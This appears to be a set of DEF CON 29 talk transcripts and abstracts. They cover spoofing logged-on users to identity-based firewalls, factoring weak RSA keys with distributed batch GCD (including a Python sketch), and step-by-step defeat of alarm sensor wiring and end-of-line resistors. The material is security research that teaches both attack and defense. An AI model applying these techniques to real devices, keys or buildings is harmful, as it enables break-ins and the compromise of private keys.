rambling about firewalls for 45 minutes. If you think I got something wrong, please reach out to me on Twitter. And if you want to play around with the stuff yourself, you can find it on my GitHub. That's all from me. Have a nice day.
|
By responding to probing requests made by Palo Alto and SonicWALL firewalls, it's possible to apply security policies to arbitrary IPs on the network, allowing access to segmented resources. Segmentation using firewalls is a critical security component for an organization. To scale, many firewall vendors have features that make rule implementation simpler, such as basing effective access on a user identity or workstation posture. Security products that probe client computers often have their credentials abused by either cracking a password hash, or by relaying an authentication attempt elsewhere. Prior work by Esteban Rodriguez and by Xavier Mertens cover this. In this talk I will show a new practical attack on identity-based firewalls to coerce them into applying chosen security policies to arbitrary IPs on a network by spoofing logged in users instead of cracking passwords. Logged on user information is often gathered using the WKST (Workstation Service Remote Protocol) named pipe. By extending Impacket with the ability to respond to these requests, logged on users on a device can be spoofed, and arbitrary firewall rules applied. We will dive into the details of how client probing has historically been a feature that should be avoided while introducing a new practical attack to emphasize that fact. REFERENCES https://www.coalfire.com/the-coalfire-blog/august-2018/the-dangers-client-probing-on-palo-alto-firewalls https://isc.sans.edu/forums/diary/The+Risk+of+Authenticated+Vulnerability+Scans/24942/ https://github.com/SecureAuthCorp/impacket https://www.rapid7.com/blog/post/2014/10/14/palo-alto-networks-userid-credential-exposure/ https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClXHCA0
|
10.5446/54190 (DOI)
|
Hello, DEF CON. Thank you for tuning into my talk, being broadcast from Raleigh, North Carolina. My name is Austin Allshouse. I'm a research scientist at BitSight, and as part of my job I do a lot of surveys and studies of security best practices across the internet. Today, I'm going to walk you through some of the low-level details of how to do one study that I did recently, involving compromising RSA keys through factorization. While this talk is nominally about how to compromise a specific subset of vulnerable RSA keys, what it's really functionally about is a scalable method to calculate shared factors across large batches of integers, because that is the mechanism by which we are going to do it. There's been a lot of past research on this topic, and many of the researchers have simply attested that they built a custom, scalable, distributed batch GCD implementation to factor keys collected from the internet, but many of these studies have been fairly light on implementation details. So this talk is going to walk you through what distributed batch GCD means and how to implement it yourself in order to break some RSA keys. I'm not going to give a whole RSA recap, but there is one thing that you need to know in order to understand the content of this talk. The first step when producing an RSA key pair is to select two random prime numbers, and the product of those two prime numbers is shared as the modulus of the public key. The security of RSA is dependent upon the fact that, given a sufficiently large key size, it is not tractable to factor that public modulus back into those constituent primes, and the secrecy of those primes is critical to the security of the private key. But while large integer factorization is a computationally difficult problem, fast and efficient methods do exist for calculating the greatest common divisor of two integers. This means that if any two RSA keys just happen to choose one of the same primes when generating keys, both of those keys can be easily compromised by calculating the greatest common divisor of the two moduli. In theory, this should never happen, as the number of potential primes to choose from is so mind-bogglingly large that it would never actually happen by chance. However, back almost a decade ago, two research teams found out that many RSA certificates collected from the internet do in fact share primes with other certificates, thus making them trivial to compromise, and they were able to attribute this phenomenon to flawed implementations of the pseudorandom number generators seeding the key generation process. Over the years, this phenomenon has been revisited, with researchers collecting and evaluating larger and larger batches of keys, necessitating various big data approaches to this problem. This culminated somewhat in a really interesting talk back at DEF CON 26, in which some folks from Kudelski Security really industrialized the key acquisition process and evaluated hundreds of millions of keys for a variety of weak implementations, including this shared prime factor vulnerability that I'm discussing today. So the question really boils down to: if some RSA keys do share primes and they can be compromised by finding shared factors across them, how do you calculate the greatest common divisor across hundreds of millions of keys?
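Before worrying about scale, the two-key case is worth seeing concretely. The snippet below is my own toy illustration (tiny primes standing in for real 1024-bit ones), not code from the talk: if two moduli share a prime, Python's built-in gcd hands it straight back, and the cofactors follow by division.

```python
# Toy illustration of why one reused prime is fatal to both keys.
from math import gcd

p, q1, q2 = 101, 103, 107      # pretend p was reused by a weak RNG
n1, n2 = p * q1, p * q2        # the two public moduli

shared = gcd(n1, n2)           # cheap even for 2048-bit moduli
print(shared, n1 // shared)    # 101 103  -> both primes of key 1
print(shared, n2 // shared)    # 101 107  -> both primes of key 2
# With p and q recovered, the private exponent is just pow(e, -1, (p-1)*(q-1)).
```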
To answer that question, we need to go back over 2000 years to what is one of the oldest known algorithms, the Euclidean algorithm, which is used to calculate the greatest common divisor of two numbers. It works by recursively calculating remainders between two numbers until the greatest common divisor of those two numbers is reached, which it may just be one if the two numbers don't actually share any common factors. In this trivially small example on the slide, comprised of four products of prime numbers, by calculating the pairwise greatest common divisor of each combination of numbers, we can discover that one pair does in fact share a common factor of seven because it has a greatest common divisor greater than one. While this slide is using small integers just for illustrative purposes, these integers could just as easily be real RSA moduli, and this is a perfectly valid way to compromise keys if there does happen to be a shared prime factor within a small batch of keys. The Euclidean algorithm is fast and efficient, but because you have to do these pairwise combinations, attempting to calculate the greatest common divisor across hundreds of millions of keys could potentially require hundreds of quadrillions of iterations of this algorithm, which means it is really just not scalable to that problem. So skipping ahead over 2,000 years again, a cryptographer named Bernstein published an efficient method for calculating the greatest common divisor across batches of numbers. Like many problems in computer science, it uses an intermediate tree data structure to bypass the requirement of having to calculate every pairwise combination of numbers. In simplest terms, Bernstein's method builds a product tree by calculating the products of pairs of numbers in the batch and then repeating this process up successive levels of the tree until the root of the tree represents the cumulative product of all numbers in the batch. It then decomposes this product tree back into remainders by calculating the remainder of each parent node with respect to the square of its child node until the leaves of the trees represent the remainders of each integer in the batch with respect to the cumulative product of the whole batch. A final greatest common divisor step is computed on each leaf remainder, which will reveal if that particular integer shares a factor with any other integer in the batch. This is a very similar approach to the Euclidean algorithm, with the key distinction being that the shared factors are being discovered with respect to the cumulative product of the whole batch instead of the various pairwise combinations of all integers in the batch. This is a very effective approach specifically for the RSA key factorization problem because in general, shared factors are relatively rare and therefore it's very likely that any factor output by this method will be one of the actual primes used in key generation and it's less likely to be some sort of composite value representing multiple shared factors in the batch. So I understand this may be very difficult to visualize just from a verbal description, so I'm going to walk you through an actual explicit example. In this example, we're using the same prime products as before, which contain two products with a shared factor of 7. Building the product tree is merely a process of pairing off the integers and calculating their products at each level until we get the cumulative product of the batch represented in green. 
After that product tree has been formed, the remainder of each parent node is calculated with respect to the square of its child node. When the bottom of the tree is reached, the greatest common divisor is calculated between the resulting remainder and the modulus, and if this value is not 1, it means it shares a factor with some other modulus in the batch. In this same example, the two shared factors of 7 are output just the same as using the pairwise Euclidean implementation described earlier. While this implementation is very fast, it does raise a new challenge in that these product trees can potentially get very, very large. Such a tree of 150 million 2048-bit RSA moduli would be over a terabyte in size, which can be very difficult to manage, especially on a single machine. So say you don't have a machine with a terabyte of memory. There's actually a pretty straightforward way to make this calculation much more manageable: instead of making one very large product tree, you can make a few smaller ones. Breaking that 150 million batch into five smaller batches will produce product trees that are roughly 180 gigabytes in size, which can be quite a bit more manageable and potentially processable on just a single machine. There is a major downside to breaking the tree up into smaller batches, however, and that is that in order to get coverage of the shared factors across these different batches, the remainder trees must be calculated with respect to each other tree, which requires this permutation step across all the trees. While this is less efficient, in practice it could actually be faster, because all the arithmetic is being done on much smaller numbers and there's no bottleneck where we're trying to do arithmetic on really huge integers at the root of a massive monolithic product tree. So to walk you through another explicit example, here we have two batches of prime products. The first batch is the same one as we had before that shares a prime factor of 7. The second batch has a shared factor of 23. And then across the two batches, there is a shared factor of 17. When calculating the remainders for each tree against the cumulative product of both trees, all of these shared factors end up falling out at the bottom. And the permutation of these trees is really important, because otherwise that factor of 17, which is shared across both batches, would not have been discovered if we were only evaluating the trees within each batch. By calculating the product trees and then permuting the remainder trees in this way, the calculation of shared factors across a huge number of integers can be broken down into batches and parallelized across any number of machines without any outrageous memory requirements. The sizes of the trees and the number of batches can really be tailored to the compute and memory resources available. Here's an example architecture that I used to factor 86 million RSA keys using just commodity hardware and no specialized software. The factorization code was all written in Go, and all that really is, is implementing the product tree and remainder tree logic that was covered earlier. The arithmetic was calculated using the native C GNU Multiple Precision (GMP) library, since allegedly it is quite a bit more performant than its Go counterpart. RSA moduli were read from S3, and the product tree levels were stored to EBS, serialized using Go's native built-in gob library.
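For reference, the per-batch product-tree and remainder-tree logic is compact enough to sketch. The Python below is my own minimal, single-machine rendering of the textbook batch-GCD algorithm, written for clarity rather than speed; it is not the talk's Go code, and the toy moduli are made up.

```python
# Minimal single-machine batch GCD: build a product tree, walk it back down as
# a remainder tree against squared children, then take a GCD at each leaf.
from math import gcd

def product_tree(moduli):
    tree = [list(moduli)]
    while len(tree[-1]) > 1:
        prev = tree[-1]
        tree.append([prev[i] * prev[i + 1] if i + 1 < len(prev) else prev[i]
                     for i in range(0, len(prev), 2)])
    return tree                                  # tree[-1][0] is the batch product

def batch_gcd(moduli):
    tree = product_tree(moduli)
    rems = tree.pop()                            # start from the root product
    while tree:
        level = tree.pop()
        # remainder of each parent with respect to the square of its child
        rems = [rems[i // 2] % (n * n) for i, n in enumerate(level)]
    # any result > 1 shares a factor with some other modulus in the batch
    return [gcd(r // n, n) for r, n in zip(rems, moduli)]

if __name__ == '__main__':
    moduli = [7 * 11, 13 * 17, 7 * 19, 23 * 29]  # first and third share the prime 7
    print(batch_gcd(moduli))                     # [7, 1, 7, 1]
```

Splitting the moduli into several batches and permuting the remainder-tree step across batches, as described above, is what keeps any single tree at a manageable size.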
The parallelism in calculating the various values at each tree level was handled just using goroutines, and orchestration of all the tree permutations was just a simple shell script. No specialized software, no big data frameworks needed. So I used that architecture to factor about 86 million keys from certificates collected from the internet over about a three month period, and found some interesting results. Fewer than 50,000 of those keys were able to be compromised due to sharing a prime factor. This is a much lower number than I was expecting, and also a much lower number than had been reported in prior years. As a sanity check, I went back and collected samples of keys dating back six years and discovered that, sure enough, the prevalence of this type of vulnerable key has decreased dramatically over the years. The chart on the slide represents the number of keys that could be factored from a random sample of 100 million keys collected in a given year, based on sharing a prime factor with some other key in that same sample. I think the dramatic decline observed here is really a testament to the impact of prior research, as it appears to have made vendors address this problem; it is far less prevalent today than it was just a couple of years earlier. The keys that were still vulnerable almost exclusively appeared in networking devices and embedded systems. But I think the question still remains: if this issue has largely been remediated, and if it is trending downward pretty dramatically, why are there still so many vulnerable keys on the internet?
Finally, I saved this chart for last because I think it is really the most important chart of the whole presentation. This chart represents the relationships between vulnerable prime values where an edge exists between two primes if they appeared in the same RSA modulus. The coloring represents the product families that the primes appeared in. For example, one color is Huawei switches, one is D-Link routers, etc. It becomes very obvious that the relationships between these primes are mostly disjoint between different products. This is really important because if they are disjoint, attempting to find shared factors across product families is somewhat of a fruitless exercise as the vendor specific random number generation flaws appear to only create prime collisions within their given product family. The implication of this is that you don't necessarily need a big data approach of collecting some huge corpus of keys to compromise keys via this method. Small collections of keys specific to a given networking device or embedded systems product are likely to be vulnerable as a massive collection of random keys that have been harvested from the internet. Much of the analysis on these flawed keys in the past has focused on keys collected from the public-facing internet, but I think this chart really shows that there may be opportunities to find additional vulnerable products in devices that are not typically exposed directly from the internet. For anyone who is able to make product targeted key collections behind an external firewall of a large organization or perhaps across many smaller organizations. So to wrap things up, almost a decade after the discovery of this phenomenon of the prevalence of shared primes and certificates on the internet, there's still a fairly large number of devices that are factorable due to these shared primes. However, this seems to be primarily the result of really old devices and not necessarily from new vulnerable products. The culprits here seem to be primarily automatically generated certificates from networking equipment, so maybe don't trust those certificates. And finally, you don't really need specialized software or a massive corpus of keys in order to compromise keys in this way. If you can get small targeted collections of keys from specific networking equipment or embedded systems products, that can potentially yield results. And to end things up, I published a reference implementation of the distributable batch GCD method described in this talk at the link on the slide. It will demonstrate the successful factorization of a small batch of actual RSA moduli. This implementation is really just for illustrative purposes. It was written in Python in order to be very simple, clear, and concise. But as a result, it's also very, very slow. It will not scale. If you want to do this on larger batches of moduli, I highly recommend that you translate the code into your favorite compiled language of choice. And I will close things with that. Thank you for tuning in, and I hope you enjoy the rest of DEF CON 29.
|
Over the past decade, there have been a number of research efforts (and DEFCON talks!) investigating the phenomenon of RSA keys on the Internet that share prime factors with other keys. This can occur when devices have poorly initialized sources of “randomness” when generating keys; making it trivial to factor the RSA modulus and recover the private key because, unlike large integer factorization, calculating the greatest common divisor (GCD) of two moduli can be fast and efficient. When describing their research, past hackers and researchers have attested that they “built a custom distributed implementation of Batch-GCD;” which seems like one hell of a detail to gloss over, right? This talk will detail a hacker's journey from understanding and implementing distributed batch GCD to analyzing findings from compromising RSA keys from network devices en masse. REFERENCES: Amiet, Nils and Romailler, Yolan. “Reaping and breaking keys at scale: when crypto meets big data.” DEF CON 26, 2018. Heninger, Nadia, et al. "Mining your Ps and Qs: Detection of widespread weak keys in network devices." 21st {USENIX} Security Symposium ({USENIX} Security 12). 2012. Hastings, Marcella, Joshua Fried, and Nadia Heninger. "Weak keys remain widespread in network devices." Proceedings of the 2016 Internet Measurement Conference. 2016. Kilgallin, JD. “Securing RSA Keys & Certificates for IoT Devices.” https://info.keyfactor.com/factoring-rsa-keys-in-the-iot-era. 2019 Daniel J. Bernstein. Fast multiplication and its applications, 2008.
|
10.5446/54194 (DOI)
|
Hello! I hope you're as psyched as I am for me to talk at you for 45 minutes all about wires. The hacker community has picked to bits many other aspects of physical access control, but the communication lines themselves remain largely a black box, and thus largely untouched, despite them being manifestly exploitable, which we'll look at today. I'm sure you've seen this particular trope, the laser hallway, where the protagonist does all sorts of incredible gymnastics to get by these lasers without tripping them and get to whatever goal exists. That's one defeat mechanism: avoiding the sensors entirely. But if we can access any part of the wire that connects the actual light detector to the upstream controller, we can then walk through all these lasers without a care in the world, knowing that our activity will not be reported on. In a more real-life example, you'll see these all over, and if you haven't yet, you will now that you know to look for them. Magnetic door contact sensors: they might look like this, or they might be mounted inside the frame, and they will detect when this door gets opened. The hackers among us will likely look at this wire here and say, there's got to be something we can do with that to avoid this device actually reporting when the door gets opened, and of course there is. So this is a talk about the sensor communication wires. We'll give a brief high-level overview of alarm systems and access control first, and then we'll talk about two ways to defeat those and to defeat end-of-line resistors, which are the most common defense and anti-tamper mechanism applied, and then we'll talk about some defenses that work against these attacks. I encourage you to go try it yourself in the Lock Bypass Village. Everything that I'm talking about today and everything that I'm showing is available as hands-on demonstrations for you to go try. So let's look at a couple of the sensors that are available. There are a lot of magnetic contact-based sensors that detect door and window opening. You might also have an area sensor such as passive infrared, or one that seismically detects someone walking on the ground, or that uses vibration to detect fence climbing. In this example, we have the floor plan schematics for a number of different ways to protect windows. So there is a contact sensor to detect the window being opened, and two different types of glass break detectors to detect someone breaking the glass. If the window can be opened or broken, we might want to have both. Now in days gone by, electronics were expensive and difficult to build, and so we wouldn't want to have an input to the controller for each of these individual sensors when they're all on the same window. The way that was handled was with alarm zones. A zone is multiple sensors wired together; if any of them gets tripped, the alarm gets tripped for that zone. So a normally closed zone will have switches that are normally connected, but they'll disconnect in the event that the sensor gets tripped, and they're wired in series, so either one disconnecting creates the alarm. A normally open zone's switches are wired in parallel, so if either of them connects, the alarm will go off. Zones are also often applied to rooms, and that's why they're called zones: any sensor in a particular room will trigger a single zone in the controller, and they'll all be wired together in that way.
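As a toy way to see the two wiring schemes side by side, here is a small model of my own (not something from the talk): a normally closed zone reads as intact only while every series switch stays closed, while a normally open zone trips as soon as any parallel switch closes.

```python
# Toy model of the two classic zone wirings.
# Switch state: True = contacts touching (circuit made), False = separated.

def nc_series_zone_alarm(switches):
    # Series loop is intact only if every normally-closed switch is still closed.
    return not all(switches)

def no_parallel_zone_alarm(switches):
    # Any normally-open switch closing completes the parallel circuit.
    return any(switches)

# Three door contacts on one normally-closed zone: opening any door alarms.
print(nc_series_zone_alarm([True, True, False]))   # True  -> alarm
# Two glass-break relays on one normally-open zone: neither has fired yet.
print(no_parallel_zone_alarm([False, False]))      # False -> quiet
```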
So we might have all of these sensors for the door being opened into the vestibule being wired into a single zone, or all the various window glass break type detectors on this room being wired into another zone. You can see an example of alarm zones with fire control systems. They are a lot more publicly viewable than security systems, and in the foyer of many large buildings, particularly with Western Hemisphere fire codes, you can look at what the zones specifically are. So is stairwell number three having a fire alarm in it? Are various other aspects that this system needs to monitor behaving correctly, and are the wires intact? And that is all going to be displayable there. The second aspect where these technologies get used is with access control systems. Alarms that we've just talked about so far at least, are relatively binary. They're trying to look for any person entering the perimeter without discriminating who it might be. Access control systems will make that determination of is it an authorized user, and it should only alarm when it's not. To the most basic access control system has an authentication device such as a card reader, and it has some means of physically allowing or denying the door to open. We might want to add a contact sensor to the door, so if the door gets opened, and there was not a card swiped, it can then trigger an alarm and indicate an unauthorized entry. If someone's leaving, that creates a problem. So we also want to have in what's called a request to exit sensor, and this particular type uses passive infrared to detect a person on the secure side of the door waiting to leave. If it detects that, and the door is subsequently opened, there's no alarm. We'll look at some of the technologies available for these different systems. So the authentication can be done with various different technologies of card readers, and there's lots of great talks so far about how to defeat those, which I won't go into anymore. It could all also involve biometric, or a code, or even a video doorbell, where a human remotely makes the go or no go decision of whether this person should be admitted. In terms of allowing the door to open or keeping it locked, we can use magnetic strikes or a magnetic lock that magnetically holds the door shut. We can also use hardware that can be remotely controlled to lock or unlock, turn style based systems, or even a vehicle entry door. Detecting that the door is open is usually done with a magnetic switch, almost always like these three here. It might be an optical base switch though, or even a mechanical switch that is pushed in when the door is closed, and some hinges can detect their position as well. And finally the request to exit is usually done with passive infrared. It might be button that you press, or pressing on the egress hardware itself will trigger the request to exit, saying that there is someone on the far side, and in secure installations it might be another card reader, so you have to badge in and out. Here's an example of one of those in the wild, so it's a passive infrared detector mounted over the door, and we also see an in-frame door contact sensor over here that will pair up with this magnet in the top of the door, and when the door is closed those are going to be together, and it will detect that the door is closed. There's a couple other pieces of hardware we can potentially exploit. One is if there's a key switch that tells the controller when it's supposed to be building open and closed hours. 
Another is accessibility buttons, particularly the one on the secure side of the door. If it gets pressed that will usually also trigger an unlocking sequence, and disable the alarm from the door being detected to be open, and the fire system. So when a mag lock is installed, if there is a fire situation, it has to unlock by code, otherwise people will be stuck inside, because otherwise the security system would be keeping it locked, and so if we trick it into thinking that there's a fire going on, that will also unlock the door for us. We won't look at these communication lines to the mag strike and the reader. That's a bit outside the scope of this talk, but everything else that's remaining on this screen is a binary communication line. It carries a yes or a no, and we can attack that to disable the alarm and cause the door to open, and in other ways defeat these systems. So we can attack the contact sensor itself to make it think the door remains closed when we've actually opened it and gone inside. We can attack the request to exit sensor to make it think someone is exiting, and then we can safely enter without triggering an alarm. We can attack the accessibility button to make it unlock, open the door, and disable the alarm. We can attack the key switch to make it think the building is open, and the fire alarm, or the communication from the fire alarm to make the security controller think that we're in a fire alarm situation, and then it will open things up accordingly. So here's one relatively straightforward example of where those wires can be accessed. So this key switch here, you can see that this can just be unscrewed, but also anywhere up this conduit will also have access to disable that alarm at the wire. The wire is often running conduits like this, and so we need to find those and then determine which ones contain the wires we're interested in. Well how is that done? Sometimes it's labeled for us. This one says FA means fire alarm, so that is generally not one that we'd want to be looking at for this purpose. One that says door contacts is much more interesting. This one also does contain fire alarm wires, but also the door contacts, and this one's security junction box is also likely one we'd want to look into. In this case we can tell contextually, well this conduit is going to about the right position for a contact sensor to be mounted on the door, but we can tell from this bolt pattern that likely that's not what it's for. It's likely to a mag lock, and they generally get mounted with this type of bolt pattern. It might also have a contact sensor here as well, and that can be defeated as well, but it's beyond the scope of this talk. Of course sometimes it just tells us, do it unplug, well the wire has been cut, I guess that's technically not unplugging, and sometimes there's very subtle contextual clues to tell us what general area of the building contains the wires we're interested in. Sometimes we can find the sensor itself and just follow the conduits back from it to figure out which wires we need to attack, and if we see a card reader or other access control type hardware that does tell us that there will likely be intrusion detection sensors that we need to find and defeat. And then the last thing that sometimes gives us access is when conduits run outside. 
It's a very bad idea to run your security wiring outside, but it is seen, particularly in historical buildings where there's not adequate duct space inside, and that's something where we can open this right up and defeat the security system from the outside. Here's a particularly egregious example where we have the contact sensor, and this is actually all mounted on the unsecure side of the door. Definitely something to avoid. If we wanted to apply our attack it might not make sense to do it right here, because it's extremely obvious to anyone passing through this area. So how would we find, way back on the line, which one is the right one? If we follow it to a conduit, and that conduit might have a rat's nest of cables in it, we need to determine which one is correct. Let's take a look at how to do that. Now if we have access to the wire at one point, we want to know where it goes, possibly to place our attack payload at a more desirable location. There is a tool we can use called a toner and probe. So we'll take our toner and clip it onto the line we want to follow, and it will put a tone down that line, which we can then listen to with our probe device. And so anywhere down the line we can then tell that, of these two, this is the one connected to what we're toning and not the other one. So once we've found the correct wire to attack and a good place to apply the attack, how do we actually do it? Take the situation of a normally closed sensor: it's connected in the normal situation and it disconnects when there's an alarm condition. In that case, all we need to do is jumper the line, and that will then simulate the switch being connected and no alarm will be raised. So in this case here it's a normally closed system, and we see that there is zero equivalent resistance seen normally. When I open the door it becomes an open circuit, so it's disconnected. To defeat that, all we have to do is cut the line, and that briefly causes an alarm, but we'll fix that momentarily, and then we'll strip the outer sheath and then the inner sheaths, and we just need to jumper from one to the other. And now the controller continues to see an equivalent resistance of zero and the door can be opened with abandon. Of course that does trigger the alarm initially, so a better way to do it is to strip just the outer sheath and then tap into the inner wires, but leaving them intact. And once that's done we can now apply a jumper wire between these two taps, and it has the same effect. When we open the door it continues to see no equivalent resistance and no alarm is triggered. The second case is a normally open switch, so in the normal situation it is disconnected and the switch will connect when the door gets opened. To defeat that all we have to do is cut the line and then it always sees an open circuit. So in this case when we open the door it goes from open circuit to a short circuit. If I cut this line it now always sees an open circuit. Now, the defenses against this. It's vulnerable to have just a simple high or low resistance being listened for. Instead we're going to switch between two different resistance values. So this is what's called an end of line resistor, and it's less vulnerable. It listens to see: is it resistance one for a normal situation, or resistance two for an alarm condition? If we detect an open circuit, so a cut line, or a short circuit, it will then trigger a different alarm indicating a tamper situation.
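As a rough sketch of what that end-of-line supervision buys the defender over a bare contact loop, here is a toy classifier in Go. It is purely illustrative; the resistance values and tolerance are invented for the example and are not taken from any real panel.

package main

import (
    "fmt"
    "math"
)

// classify is a toy end-of-line supervision check. A plain normally-closed
// loop only distinguishes "connected" from "open"; an EOL loop also flags
// shorts and cut lines as tamper. Thresholds here are made up.
func classify(measuredOhms float64) string {
    const normal, alarm, tolerance = 2000.0, 4000.0, 200.0
    switch {
    case measuredOhms < 100: // near short circuit
        return "tamper (short)"
    case math.IsInf(measuredOhms, 1) || measuredOhms > 1e6: // open circuit
        return "tamper (cut line)"
    case math.Abs(measuredOhms-normal) < tolerance:
        return "normal"
    case math.Abs(measuredOhms-alarm) < tolerance:
        return "alarm"
    default:
        return "trouble"
    }
}

func main() {
    for _, r := range []float64{0, 2000, 4000, math.Inf(1)} {
        fmt.Printf("%8.0f ohms -> %s\n", r, classify(r))
    }
}

A plain normally-closed loop only has the first two states, which is exactly why the jumper and cut attacks above work so cleanly against it.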
And of course the best defense would be a well-designed encrypted digital communication line. Those are much more expensive and have limitations for the maximum wire run, so they're much less common to see. These end of line resistors though are ubiquitous. So how do we defeat those? Well before we get into that we'll do some very brief review of resistors in general. So there's only three slides I promise. The first concept to remember is that resistance measured in ohms is how hard it is to put power through it. And by Ohm's law it is the voltage applied across the resistor divided by the current that then gets flowing through. The second aspect to keep in mind is two resistors wired in series will have an equivalent resistance that the sum of them and when they're wired in parallel it's going to be this harmonic sum which makes some sense when you think about it. One over resistance is how easy it is for power to pass through just like resistance is how hard it is and in fact there's a name for it conductance. And so with resistors wired in parallel the conductances add up. There's sort of a fun graphical computation available to us here by taking three equal scales at 60 degree angles. We can apply a line from our two resistances. So if r1 and r2 are both a thousand ohms the equivalent for them in parallel will be 500 here. 800 and 400 will then give us about 267 ohms equivalent in parallel. So that's kind of a cool tangent there. Keeping that in mind we usually don't have switches that flip between two separate resistors. Instead we have a simple normally closed or open switch that will engage one resistor while the other is always connected. So in this case when the switch gets closed we now have the equivalent resistance of these two seen in parallel. But I'll continue to use this style of diagram for clarity in the rest of these demonstrations. The last part that we'll have to consider is how does the controller measure resistance. So it can put a voltage across the line and measure the current through based on Ohm's law. What's more common is to have it put a voltage across the line and have some sort of internal resistance. And then it measures the voltage between that internal resistance and the end of line resistor. This is what's called a voltage divider. So there's going to be a certain voltage applied by our power source. There's going to be a voltage drop across the internal resistor and a voltage drop across the end of line resistors. The sum of those two resistor voltage drops is going to equal the applied voltage. And how much of a voltage drop applies on each is going to be dependent on the relative resistance values of those two which we can then measure by this voltage in the middle. So two special cases that are relevant here. When we have an open circuit situation no current flows. The ammeter will measure zero. And because no current is flowing through this internal resistor it has no voltage drop across it by Ohm's law. And therefore the voltage measured is equal to the source voltage. In the case of a short circuit a lot of current will flow. If there's no internal resistor it's going to do some damage. And we're wiring now the top and the bottom of our voltmeter together. And so the volt meter was going to measure zero volts. For instance one commonly seen system is Honeywell Design Systems where there's a 2.8 kilo ohm internal resistor and two kilo ohm end of line resistors. 
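For reference, here are the relationships just described, written out in standard notation (nothing alarm-specific, just the usual circuit formulas):

\[ V = I R, \qquad R_{\mathrm{series}} = R_1 + R_2, \qquad R_{\mathrm{parallel}} = \Big(\tfrac{1}{R_1} + \tfrac{1}{R_2}\Big)^{-1} = \frac{R_1 R_2}{R_1 + R_2}, \]

and for the voltage divider the controller is really reading,

\[ V_{\mathrm{measured}} = V_{\mathrm{source}} \cdot \frac{R_{\mathrm{EOL}}}{R_{\mathrm{internal}} + R_{\mathrm{EOL}}}, \]

with the open-circuit case giving \( V_{\mathrm{measured}} = V_{\mathrm{source}} \) and the short-circuit case giving \( V_{\mathrm{measured}} = 0 \), matching the two special cases above. As a check on the parallel rule: two 1000 ohm resistors in parallel give 500 ohms, and 800 with 400 gives about 267 ohms, the same numbers as the graphical trick.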
When this circuit gets closed or completed we then have a voltage divider that creates five volts measured by the controller. And when it gets opened we have the full 12 volt source that is measured by the controller. What do these end of line resistors look like? Well they're a lot easier to spot with fire systems where they tend to be in large well-labeled boxes such as these supervising the alarm bell, these end of line labeled devices here, or this supervising the firefighters telephone. This is called line supervision in fire alarm systems. And it's done because if the line gets accidentally or environmentally damaged people could die. And they tend to be in large well-labeled boxes because for fire alarms it's important that they be easily accessible and inspectable. With security the opposite is true. So security end of line resistors tend to be installed directly inside the sensors that they're supervising. In this case we have one installed between these two leads here which ends up being in series with the tamper and the regular infrared detector relays. And that will then detect whether either of those gets tripped and if they're both in the normal state we will see this resistance at the controller. And so we can see that a little bit zoomed in here. So attacking these end of line resistors is a somewhat involved process because we don't know from the outset what the end of line resistance value is, what the polarity is, etc. So let's take a look at how that might get accomplished. So first we'll strip the line and we'll tap it in two places and this is going to enable us to measure the voltage on this line. We'll install a voltmeter and wire it up. And it now measures 5 volts across this line. If we would open the door we would now see 12 volts across. The second thing we need to measure is the current. Once we have voltage and current we can divide the two and get the equivalent end of line resistance. And to measure current it has to pass through our ammeter. So we'll tap this line in a second place and install an ammeter here. And then we'll have the current run into our ammeter and we'll have it run through a switch. You'll see why in just a second this is so that we'll be able to engage our attack when we're ready to do that. And so I'll run the wire to the switch and then from the switch to our tap device. And now we're seeing zero current. This makes sense because it's still passing through the line right here. So I'm going to need to cut this line and then we'll actually measure the current passing through. And we now see that this is 2.5 milliamps approximately. So what can we do here? Well we have the voltage. It's about 5 volts and the current about 2.5 milliamps. And if we divide those two we get 2000 ohms or 2 kilo ohms because this is milliamps. So we'll now find an appropriate resistor that's as close to 2 kilo ohms as we can. And the one we have this closest is 1.96 kilo ohms which we'll install right here. And now what we need to do is on the other side of the switch when we flip it we'll instead route current through this resistor and then over to the negative line. So let's install that now. So wire the switch to the resistor and then the resistor to the negative line. And so now when we flip this switch current is now getting routed through the resistor. So from this positive line over through the switch through the resistor up to the negative line. 
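As a worked check, plugging the Honeywell-style values quoted above into that divider formula:

\[ V_{\mathrm{closed}} = 12\,\mathrm{V} \cdot \frac{2\,\mathrm{k}\Omega}{2.8\,\mathrm{k}\Omega + 2\,\mathrm{k}\Omega} = 5\,\mathrm{V}, \qquad V_{\mathrm{open}} = 12\,\mathrm{V}, \]

and the attack measurement recovers the end-of-line value directly:

\[ R_{\mathrm{EOL}} = \frac{V}{I} = \frac{5\,\mathrm{V}}{2.5\,\mathrm{mA}} = 2\,\mathrm{k}\Omega, \]

which is why the 1.96 kilo-ohm resistor, the closest value on hand, lands comfortably inside the controller's tolerance band.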
And so now the controller sees the same equivalent end of line resistance as it saw when the door was in the normal situation. When we open the door the controller still sees our attack resistance and no alarm is raised. Of course if we flip the switch back and when we open the door now it's all systems as normal. So that's how that attack gets implemented to make this easier in the physical world. I've designed a couple modifications to be made to a standard multimeter to allow you to clip onto the positive and negative leads of the alarm wire and then somewhere downstream on the positive leads so we can cut the line and measure current in between. We can flip a switch to measure the voltage and we can measure then the resistance value between the green and white switches. And then when that's all set up and ready to go we can flip this star switch here and that will engage the attack and re-route power so that the black is connected to the yellow through the resistor and then green gets connected to red and back to the controller. The schematic for this looks like this. I won't go into it in detail but this should be enough for you to design and build your own. And the wiring is this rat's nest here and we can see how it's wired directly into the measurement ports of the multimeter so that it can measure our voltage current and resistance as we perform the attack. So let's look at what this looks like physically. So I have here a system simulating an alarm system. We have our controller which measures the current and voltage being provided, the transmission line, and then our door at the end. So here's our door contact sensor, the end of line resistor. When I open the door it opens circuits it so disconnects and we then get no current and the full supply voltage of 10 being read at the controller. When the door closes again we get a one-to-one voltage divider so the end of line resistor being the same as the internal controller resistance and we get half or five volts and 50 milliamps flowing through. Let's see how we'll attack this. So this is a standard twisted pair wire. So we'll open it up and give ourselves some room to work and then I'm going to use these devices here. They're made by Scotchlock by 3M. They're called the Scotchlock tap devices and I put one wire into here and get that fully in past the little plastic clips. I then take the other wire that I want to connect to the line that I'm tapping into and insert it into the other port of our tap device, insert it all the way and once I'm satisfied that those are fully in I'll clamp it down. So we've now tapped into this wire. We'll do the same on the other side and clamp it down firmly and we now have access to the positive and ground lines. We can now use our homemade alarm wire defeat device and I'm going to clamp onto each of these and I can measure the voltage across now. So we'll put it in voltage mode and then flip this switch to send the red and the black to the leads of our multimeter and we get about 5 volts. To measure the current we need to tap it a second time so I will on the hot wire. I know that this is the hot wire because the voltage measured was positive. We'll take another tap and we'll tap it a second time on this line. This will then force all of the current to flow through our multimeter and we can measure the current when we cut the line in between. So make sure 